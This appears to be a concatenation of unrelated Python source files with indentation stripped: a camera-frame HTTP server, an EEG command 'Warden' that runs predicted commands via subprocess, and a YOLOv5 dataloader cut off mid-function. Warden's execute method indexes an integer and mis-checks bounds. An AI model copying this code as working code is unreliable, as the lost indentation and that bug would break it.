HTML formatted string with the list with elements
"""
image_list_html = "<ul>"
for frame in CameraHandler.image_queue:
image_list_html += "<li>frame: <a href=\"/{}\">{}</a></li>".format(
frame,
frame
)
for stream in CameraHandler.stream_queue:
image_list_html += "<li>stream: <a href=\"/{}\">{}</a></li>".format(
stream,
stream
)
image_list_html += "</ul>"
return image_list_html
def put_image(name, image):
"""Enqueues a frame that will be shown on the HTTP server
Args:
frame (array): Bitmap image
"""
CameraHandler.image_queue[name] = image
def stream_images(name, image):
"""Enqueues a frame in the video stream that will be shown
on the HTTP server
Args:
name (str): Title of the stream to show
frame (array): Bitmap image
"""
if name not in CameraHandler.stream_queue:
CameraHandler.stream_queue[name] = Queue()
# dump old frames...
while CameraHandler.stream_queue[name].qsize() > 3:
CameraHandler.stream_queue[name].get()
CameraHandler.stream_queue[name].put(image)
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""ThreadedHTTPServer integrates the Threading mixin, meaning
that now the HTTP server can serve multiple clients, each one
handled by a separated thread from the pool."""
class HttpStreamOutput:
"""Helper class that implements a HTTP server. It wraps
methods around the CameraHandler static class to ease the interaction
between the WebOutput and the static class
"""
DEFAULT_HOST_ADDRESS = '0.0.0.0'
DEFAULT_PORT = 8080
def __init__(self,
address: str = DEFAULT_HOST_ADDRESS,
port: int = DEFAULT_PORT
):
"""Initializes the server thread
Args:
address (str, optional): [description]. Defaults to HttpStreamOutput.DEFAULT_HOST_ADDRESS.
port (int, optional): [description]. Defaults to HttpStreamOutput.DEFAULT_PORT.
"""
self._server = ThreadedHTTPServer(
(address, port),
CameraHandler
)
self._server_thread = Thread(
target=lambda: self._server.serve_forever()
)
self._server_thread.setDaemon(True)
def startServer(self):
"""Starts serving
"""
self._server_thread.start()
def stopServer(self):
"""Stops serving
"""
self._server.socket.close()
def putImage(self, name, frame):
"""Sends a frame to the HTTP image display
Args:
name (str): Title of the frame to show
frame (array): Bitmap image
"""
self._server.RequestHandlerClass.put_image(name, frame)
def streamImage(self, name, frame):
"""Sends a frame to the HTTP video stream
Args:
name (str): Title of the stream to show
frame (array): Bitmap image
"""
self._server.RequestHandlerClass.stream_images(name, frame)
class WebOutput(HttpStreamOutput):
"""Concrete class that implements a media output for devices that
doesn't support visual screen output, but count with LAN connection.
For this purpose, the WebOutput class uses an HTTP server that renders
both, images and video stream using a fixed address and port.
"""
def __init__(self, port: int):
"""Initializes the HTTP server
Args:
port (int): HTTP server port
"""
HttpStreamOutput.__init__(self, port=port)
self.startServer()
def show(self, name: str, frame):
"""Displays on server the frame. This method creates a new
list entry that can be accesed in the HTTP server. By clicking
in this list entry, the image will be displayed in the web browser.
Args:
name (str): Title of the frame to show
frame (array): Bitmap image
"""
self.putImage(name, frame)
def stream(self, name: str, frame):
"""Sends a frame to the web server video stream. This method creates
a new list entry that can be accesed in the HTTP server. The name will
serve as a reference to the video stream queue, and the frames will
be enqueued to the video stream queue.
Args:
name (str): Title of the stream to show
frame (array): Bitmap image
"""
self.streamImage(name, frame)
def __del__(self):
"""Destroys and finishes all the resources asociated with
the screen output. In this case, finish the serving
"""
self.stopServer()
def waitForKey(self, delay: int = 0):
"""Waits for a pressed key. Waits indefinitely when delay is = 0,
and it waits delay millseconds
Args:
delay (int): Delay in milliseconds. 0 is the special value
that means "forever".
"""
if not delay:
input()
else:
time.sleep(delay/1000)
def clear(self):
"""Remove all images and video stream entries on the webserver
"""
CameraHandler.image_queue.clear() |
Warden.py | from kernel.Interfaces.IConsumer import IConsumer
from kernel.Interfaces.IProducer import IProducer
from kernel.Interfaces.IStoreManager import IStoreManager
from kernel.Neural import Neural
import kernel
from ctypes import c_int32
import multiprocessing
import numpy as np
import subprocess
class Warden:
"""
This component is the central component that manages all dependencies among others.
"""
def __init__(self, producer: IProducer, consumer: IConsumer, store_manager: IStoreManager):
"""
Constructor that initializes entity
:param producer: Producer that creates data.
:param consumer: Consumer that consumes data.
:param store_manager: Store manager to get and set data.
"""
self.__producer__ = producer(self)
self.__consumer__ = consumer(self)
self.__store_manager__ = store_manager()
self.__queue__ = multiprocessing.Queue()
self.__event__ = multiprocessing.Event()
self.__external_event__ = multiprocessing.Event()
self.__internal_event__ = multiprocessing.Event()
self.__command_id__: multiprocessing.Value = multiprocessing.Value(c_int32, 0)
self.__user_id__: multiprocessing.Value = multiprocessing.Value(c_int32, 0)
self.__threshold__ = kernel.get_threshold()
self.__mode__ = 0
self.__neural__ = None
self.__commands__ = None
def set_train_mode(self):
"""
Set mode as train.
:return:
"""
self.__mode__ = 0
def set_inference_mode(self):
"""
Sets mode as inference.
:return:
"""
self.__mode__ = 1
def is_train_mode(self):
"""
Tells if actual mode is train.
:return:
"""
return self.__mode__ == 0
def is_inference_mode(self):
"""
Tells if actual mode is inference.
:return:
"""
return self.__mode__ == 1
def get_active_command(self):
"""
Get the active command, the command that is being trained.
:return: The command in training mode.
"""
return self.__command_id__
def set_active_command(self, command_id):
"""
Set the active command, the command that is going to be trained.
:param command_id: Command id to be trained.
"""
self.__command_id__ = command_id
def get_active_user(self):
"""
Get the user that is being trained.
:return: The user in training mode.
"""
return self.__user_id__
def set_active_user(self, user_id):
"""
Set the user that is in active mode.
:param user_id: The user in training mode.
:return: The active user.
"""
self.__user_id__ = user_id
def lock(self):
"""
Locks the producer-consumer relation.
"""
self.__consumer__.lock()
def wait_internal(self):
"""
Waits until a process be signaled.
"""
self.__internal_event__.wait()
def lock_internal_process(self):
"""
Locks a process waiting to continue.
:return:
"""
self.__internal_event__.clear()
def unlock_internal_process(self):
"""
Unlocks a signaled process.
"""
self.__internal_event__.set()
def wait_process(self):
"""
Waits until a process be signaled.
"""
self.__external_event__.wait()
def lock_external_process(self):
"""
Locks a process waiting to continue.
:return:
"""
self.__external_event__.clear()
def unlock_external_process(self):
"""
Unlocks a signaled process.
"""
self.__external_event__.set()
def start(self):
"""
Starts Warden and process associated depending on it is in train or inference the execution will be different.
"""
print("Arrancando componente productor")
producer_process = multiprocessing.Process(target=self.__producer__.start)
producer_process.daemon = True
producer_process.start()
print("Arrancando componente consumidor")
if self.is_inference_mode():
print("Cargando datos del modelo")
self.__store_manager__.refresh()
self.__neural__ = Neural(self.__store_manager__)
self.__neural__.load_model(self.__user_id__)
print("Cargando datos del usuario")
user = self.__store_manager__.get_user(self.__user_id__)
commands = user.get_commands()
self.__commands__ = {}
for command in commands:
parameters = command.get_parameters()
if parameters is None:
parameters = [command.get_action()]
else:
parameters.insert(0, command.get_action())
self.__commands__[command.get_id()] = parameters
self.__consumer__.start()
else:
self.__event__.clear()
consumer_process = multiprocessing.Process(target=self.__consumer__.start)
consumer_process.daemon = True
consumer_process.start()
def execute(self, data):
"""
Executes the command infered.
:param data: Data used for neural network to infer command.
"""
try:
command_id = self.__neural__.predict(data) + 1
if command_id < len(self.__commands__):
subprocess.run(self.__commands__[(command_id)[0]])
except Exception as e:
print(e)
def train(self):
"""
Executes the train mode
"""
print("Preparando ML")
self.__store_manager__.refresh()
self.__neural__ = Neural(self.__store_manager__)
user = self.__store_manager__.get_user(self.__user_id__)
data = None
target = np.array([])
cmds = user.get_commands()
for cmd in cmds:
cmd = self.__store_manager__.load_command(self.__user_id__, cmd)
if cmd is not None:
d_res = cmd.get_eeg()
if d_res is not None:
t_res = np.repeat(cmd.get_id(), len(d_res)).astype(np.int)
if data is None:
data = d_res
else:
if len(data.shape) == 1:
data = data[0].reshape(1, -1)
try:
data = np.append(data, d_res, axis=0)
except Exception:
print("exp")
target = np.concatenate((target, t_res), axis=0).astype(np.int)
print("Empezando ML")
self.__neural__.process(data, target)
self.__neural__.create_softmax()
train_loss = self.__neural__.reset_and_train_network(False)
predicted_values, test_loss = self.__neural__.evaluate_network(self.__neural__.__data_train__,
self.__neural__.__target_train__)
percentage = self.__neural__.compute_success(self.__neural__.__target_train__, predicted_values) * 100
print("Se ha conseguido un {0:.2f}% de acierto con un error de {1:.2f}% y una perdida de {2:.2f}.".format(
percentage, test_loss, min(train_loss)))
if percentage > self.__threshold__:
print("Se va a guardar este modelo.")
self.__neural__.save_model(self.__user_id__)
else:
print("La calidad es demasiado baja y se va a descartar este modelo.")
self.unlock_external_process()
def stop(self):
"""
Stops Warden and all processes.
"""
self.__producer__.stop()
self.__consumer__.stop()
|
datasets.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
from zipfile import ZipFile
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import (
Albumentations,
augment_hsv,
copy_paste,
letterbox,
mixup,
random_perspective,
)
from utils.general import (
DATASETS_DIR,
LOGGER,
NUM_THREADS,
check_dataset,
check_requirements,
check_yaml,
clean_str,
cv2,
segments2boxes,
xyn2xy,
xywh2xyxy,
xywhn2xyxy,
xyxy2xywhn,
)
from utils.torch_utils import torch_distributed_zero_first
def resize_image(image, long_size, interpolation=cv2.INTER_LINEAR):
height, width, channel = image.shape
# set target image size
target_size = long_size
ratio = target_size / max(height, width)
target_h, target_w = int(height * ratio), int(width * ratio)
image = cv2.resize(image, (target_w, target_h), interpolation=interpolation)
return image
def numpy_img(img, size):
img = cv2.imread(img)
img = resize_image(img, size)
return img
def file_to_torch(img, device):
img = img[:, :, ::-1].transpose(2, 0, 1)
img = img[np.newaxis, :, :, :]
img = img.copy()
im = torch.from_numpy(img)
im = im.float().div(255.0).to(device)
return im
# Parameters
HELP_URL = "https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data"
IMG_FORMATS = (
"bmp",
"dng",
"jpeg",
"jpg",
"mpo",
"png",
"tif",
"tiff",
"webp",
) # include image suffixes
VID_FORMATS = (
"asf",
"avi",
"gif",
"m4v",
"mkv",
"mov",
"mp4",
"mpeg",
"mpg",
"ts",
"wmv",
) # include video suffixes
BAR_FORMAT = "{l_bar}{bar:10}{r_bar}{bar:-10b}" # tqdm bar format
LOCAL_RANK = int(
os.getenv("LOCAL_RANK", -1)
) # https://pytorch.org/docs/stable/elastic/run.html
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == "Orientation":
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update("".join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(
path,
imgsz,
batch_size,
stride,
single_cls=False,
hyp=None,
augment=False,
cache=False,
pad=0.0,
rect=False,
rank=-1,
workers=8,
image_weights=False,
quad=False,
prefix="",
shuffle=False,
):
if rect and shuffle:
LOGGER.warning(
"WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False"
)
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(
path,
imgsz,
batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix,
)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min(
[os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]
) # number of workers
sampler = (
None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
)
loader = (
DataLoader if image_weights else InfiniteDataLoader
) # only DataLoader allows for attribute updates
return (
loader(
dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4
if quad
else LoadImagesAndLabels.collate_fn,
),
dataset,
)
class InfiniteDataLoader(dataloader.DataLoader):
"""Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, "batch_sampler", _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
"""Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if "*" in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, "*.*"))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f"ERROR: {p} does not exist")
images = [x for x in files if x.split(".")[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split(".")[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = "image"
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, (
f"No images or videos found in {p}. "
f"Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}"
)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = "video"
ret_val, img0 = self.cap.read()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f"video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: "
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f"Image Not Found {path}"
s = f"image {self.count}/{self.nf} {path}: "
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe="0", img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord("q"): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f"Camera Error {self.pipe}"
img_path = "webcam.jpg"
s = f"webcam {self.count}: "
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources="streams.txt", img_size=640, stride=32, auto=True):
self.mode = "stream"
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [
x.strip() for x in f.read().strip().splitlines() if len(x.strip())
]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = (
[None] * n,
[0] * n,
[0] * n,
[None] * n,
)
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f"{i + 1}/{n}: {s}... "
if urlparse(s).hostname in (
"www.youtube.com",
"youtube.com",
"youtu.be",
): # if source is YouTube video
check_requirements(("pafy", "youtube_dl==2020.12.2"))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f"{st}Failed to open {s}"
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float(
"inf"
) # infinite stream fallback
self.fps[i] = (
max((fps if math.isfinite(fps) else 0) % 100, 0) or 30
) # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(
target=self.update, args=([i, cap, s]), daemon=True
)
LOGGER.info(
f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)"
)
self.threads[i].start()
LOGGER.info("") # newline
# check for common shapes
s = np.stack(
[
letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape
for x in self.imgs
]
)
self.rect = (
np.unique(s, axis=0).shape[0] == 1
) # rect inference if all shapes equal
if not self.rect:
LOGGER.warning(
"WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams."
)
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = (
0,
self.frames[i],
1,
) # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning(
"WARNING: Video stream unresponsive, please check your IP camera connection."
)
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord(
"q"
): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [
letterbox(
x, self.img_size, stride=self.stride, auto=self.rect and self.auto
)[0]
for x in img0
]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ""
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = (
os.sep + "images" + os.sep,
os.sep + "labels" + os.sep,
) # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit(".", 1)[0] + ".txt" for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(
self,
path,
img_size=640,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_images=False,
single_cls=False,
stride=32,
pad=0.0,
prefix="",
):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = (
self.augment and not self.rect
) # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / "**" / "*.*"), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [
x.replace("./", parent) if x.startswith("./") else x
for x in t
] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f"{prefix}{p} does not exist")
self.im_files = sorted(
x.replace("/", os.sep)
for x in f
if x.split(".")[-1].lower() in IMG_FORMATS
)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f"{prefix}No images found"
except Exception as e:
raise Exception(
f"{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}"
)
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (
p if p.is_file() else Path(self.label_files[0]).parent
).with_suffix(".cache")
try:
cache, exists = (
np.load(cache_path, allow_pickle=True).item(),
True,
) # load dict
assert cache["version"] == self.cache_version # same version
assert cache["hash"] == get_hash(
self.label_files + self.im_files
) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop(
"results"
) # found, missing, empty, corrupt, total
if exists and LOCAL_RANK in (-1, 0):
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupt"
tqdm(
None, desc=prefix + d, total=n, initial=n, bar_format=BAR_FORMAT
) # display cache results
if cache["msgs"]:
LOGGER.info("\n".join(cache["msgs"])) # display warnings
assert (
nf > 0 or not augment
), f"{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}"
# Read cache
[cache.pop(k) for k in ("hash", "version", "msgs")] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = (
np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int)
* stride
)
# Cache images into RAM/disk for faster training (WARNING: large datasets may exceed system resources)
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix(".npy") for f in self.im_files]
if cache_images:
gb = 0 # Gigabytes of cached images
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = (
self.cache_images_to_disk if cache_images == "disk" else self.load_image
)
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(
enumerate(results),
total=n,
bar_format=BAR_FORMAT,
disable=LOCAL_RANK > 0,
)
for i, x in pbar:
if cache_images == "disk":
gb += self.npy_files[i].stat().st_size
else: # 'ram'
(
self.ims[i],
self.im_hw0[i],
self.im_hw[i],
) = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.ims[i].nbytes
pbar.desc = f"{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})"
pbar.close()
def cache_labels(self, path=Path("./labels.cache"), prefix=""):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = (
0,
0,
0,
0,
[],
) # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(
pool.imap(
verify_image_label,
zip(self.im_files, self.label_files, repeat(prefix)),
),
desc=desc,
total=len(self.im_files),
bar_format=BAR_FORMAT,
)
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info("\n".join(msgs))
if nf == 0:
LOGGER.warning(
f"{prefix}WARNING: No labels found in {path}. See {HELP_URL}"
)
x["hash"] = get_hash(self.label_files + self.im_files)
x["results"] = nf, nm, ne, nc, len(self.im_files)
x["msgs"] = msgs # warnings
x["version"] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix(".cache.npy").rename(path) # remove .npy suffix
LOGGER.info(f"{prefix}New cache created: {path}")
except Exception as e:
LOGGER.warning(
f"{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}"
) # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp["mosaic"]
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp["mixup"]:
img, labels = mixup(
img, labels, *self.load_mosaic(random.randint(0, self.n - 1))
)
else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = (
self.batch_shapes[self.batch[index]] if self.rect else self.img_size
) # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(
labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1]
)
if self.augment:
img, labels = random_perspective(
img,
labels,
degrees=hyp["degrees"],
translate=hyp["translate"],
scale=hyp["scale"],
shear=hyp["shear"],
perspective=hyp["perspective"],
)
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(
labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1e-3
)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp["hsv_h"], sgain=hyp["hsv_s"], vgain=hyp["hsv_v"])
# Flip up-down
if random.random() < hyp["flipud"]:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp["fliplr"]:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = (
self.ims[i],
self.im_files[i],
self.npy_files[i],
)
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f"Image Not Found {f}"
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(
im,
(int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_LINEAR
if (self.augment or r > 1)
else cv2.INTER_AREA,
)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return (
self.ims[i],
self.im_hw0[i],
self.im_hw[i],
) # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (
int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border
) # mosaic center x, y
indices = [index] + random.choices(
self.indices, k=3
) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img4
if i == 0: # top left
